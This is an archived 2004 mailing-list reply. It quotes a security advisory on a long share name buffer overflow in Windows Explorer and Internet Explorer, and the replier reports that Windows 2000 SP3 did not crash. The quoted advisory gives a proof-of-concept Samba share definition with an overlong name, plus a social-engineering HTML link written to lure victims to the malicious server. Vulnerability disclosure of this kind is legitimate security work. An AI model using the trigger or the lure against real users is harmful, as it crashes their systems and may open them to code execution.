lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 26 Apr 2004 15:55:55 -0500 (CDT) From: Daniel Regalado Arias <dan57170@...oo.com> To: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>, full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com, submissions@...ketstormsecurity.org, info@...uriteam.com Subject: Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow. Well, i have tested it in W2k with sp3 and explorer didnt get crashed!!!!!!! Well, i cant get into the share because a message appears saying "share name not found"!!!! But, explorer is OK. --- Rodrigo Gutierrez <rodrigo@...ellicomp.cl> escribió: > Sunday afternoon is a bit boring, and weather sucks > down here in Santiago, > Chile so here we go... > The vuln is attached in TXT format, I would be > gratefull if someone could > verify if it affects windows 2003 as well. > > Rodrigo.- > > Microsoft Explorer and Internet Explorer Long Share > Name Buffer Overflow. > > > > Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl> > > Affected: MS Internet Explorer, MS Explorer > (explorer.exe) > Windows XP(All), Windows 2000(All) > > Not Tested: Windows 2003, Windows me, Windows 98, > Windows 95 > > Vendor Status: i notified the vendor in the > beginning of 2002, this > vulnerability was supposed to be > fixed in xp service > pack 1 according to the vendors > knowledge base article > 322857. > > Vendor url: > http://support.microsoft.com/default.aspx?scid=kb;en-us;322857 > > > > Background. > > MS Explorer (explorer.exe) and MS Internet > Explorer(IEXPLORE.EXE) are > core pieces of Microsoft Windows Operating Systems. > > > > Description > > Windows fails to handle long share names when > accessing a remote > file servers such as samba, allowing a malicious > server to crash the > clients explorer and eventually get to execute > arbitrary code in the > machine as the current user (usually with > Administrator rights in windows > machines). > > > > Analysis > > In order to exploit this, an attacker must be able > to get a user to connect > to a malicious server which contains a share name > equal or longer than 300 > characters, windows wont allow you to create such a > share, but of course samba > includes the feature ;). After your samba box is > up and running create a > share in you smb.conf : > > > > #------------ CUT HERE ------------- > > [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] > comment = Area 51 > path = /tmp/testfolder > public = yes > writable = yes > printable = no > browseable = yes > write list = @trymywingchung > > #------------ CUT HERE ------------- > > > After your server is up, just get to your windows > test box and get to the > start menu > run > \\your.malicious.server.ip., > plufff, explorer will crash > :). > > Social Engineering: > > <a href="\\my.malicious.server.ip">Enter My 0day > sploit archive</a> > > > > Workaround. > > From your network card settings disable the client > for Microsoft networks > until a real fix for this vulnerability is > available. > _________________________________________________________ Do You Yahoo!? Información de Estados Unidos y América Latina, en Yahoo! Noticias. Visítanos en http://noticias.espanol.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists